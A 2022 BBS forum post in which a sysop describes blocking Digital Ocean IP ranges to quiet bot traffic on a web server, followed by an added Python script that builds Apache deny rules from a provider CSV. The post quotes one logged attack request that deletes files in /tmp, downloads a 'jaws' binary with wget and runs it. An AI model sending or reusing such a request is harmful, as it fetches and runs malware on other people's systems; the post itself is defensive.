Subj : IP Block Lists
To   : All
From : Warpslide
Date : Fri Mar 18 2022 22:22:36

Hi All,

I have a web server accessible to the public, which as expected was getting hammered with various bots & script kiddies. I've set up an IP blocklist for the usual suspects, but I was noticing a lot of malicious traffic from California, Germany, The Netherlands & the UK as well.

Not wanting to block those countries out entirely I decided to dig a little deeper and noticed that many of these addresses had one thing in common: They're coming from Digital Ocean.

Most of these seem to be trying to log into WordPress or bring up other login pages for other services that don't exist on this web server. Others seem to be a little more insidious:

"GET /shell?cd+/tmp;rm+-rf+*;wget+31.210.xx.xxx/jaws;sh+/tmp/jaws HTTP/1.1"

None of these work or do anything on my webserver, but I still don't want them hammering on my system.

Fortunately Digital Ocean publishes a full list of the IP addresses they use:

https://digitalocean.com/geo/google.csv

After adding these ranges to my blocklist suddenly my apache logs are a lot quieter.

Do you filter by country/region or by provider? If so, which IP ranges do you block?

P.S.: I know some BBS hubs are located on VPS providers, you may need to modify these lists if you want to use them so you can still communicate with your hub if they happen to use Digital Ocean. ML looks like he uses OVH so he's safe... ;)

Jay

.... The manner in which it is given is worth more than the gift.
--- Mystic BBS v1.12 A48 2022/03/11 (Raspberry Pi/32)
 * Origin: Northern Realms (1337:3/126)
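
The provider-range blocklist described in the message above, including the P.S. about keeping a hub reachable, as an added example that is not part of the original post. It assumes the published list is a CSV with the CIDR prefix in the first column; the sample rows use documentation address ranges, the hub address is hypothetical, and Apache 2.4 `Require not ip` lines are just one possible output format.

```python
import csv
import io
import ipaddress

# Constructed sample rows (documentation ranges only). Assumed layout:
# prefix,country,region,city,postal with the CIDR prefix in column one.
SAMPLE_FEED = """\
# constructed sample, not real provider data
192.0.2.0/25,US,US-CA,San Francisco,94124
192.0.2.128/25,US,US-CA,San Francisco,94124
198.51.100.0/24,DE,DE-HE,Frankfurt,60341
2001:db8:1::/48,NL,NL-NH,Amsterdam,1098 XH
not-a-prefix,GB,GB-ENG,London,
"""

def parse_feed(text):
    """Return the valid networks from the feed, skipping comments and junk rows."""
    nets = []
    for row in csv.reader(io.StringIO(text)):
        if not row or row[0].lstrip().startswith("#"):
            continue
        try:
            nets.append(ipaddress.ip_network(row[0].strip(), strict=False))
        except ValueError:
            continue  # malformed prefix: never turn it into a rule
    return nets

def build_blocklist(nets, allow=()):
    """Merge adjacent ranges, then carve allowlisted addresses back out."""
    allow_nets = [ipaddress.ip_network(a, strict=False) for a in allow]
    blocked = []
    for version in (4, 6):
        pieces = list(ipaddress.collapse_addresses(
            n for n in nets if n.version == version))
        for hole in (a for a in allow_nets if a.version == version):
            kept = []
            for p in pieces:
                if hole.subnet_of(p):
                    kept.extend(p.address_exclude(hole))  # split around the hole
                elif not p.subnet_of(hole):
                    kept.append(p)  # untouched by this allow entry
            pieces = kept
        blocked.extend(sorted(pieces))
    return blocked

def apache_rules(nets):
    """One mod_authz_host line per range, for use inside a <RequireAll> block."""
    return ["Require not ip %s" % n for n in nets]

if __name__ == "__main__":
    hub = ["198.51.100.7"]  # hypothetical hub address that must stay reachable
    print("\n".join(apache_rules(build_blocklist(parse_feed(SAMPLE_FEED), hub))))
```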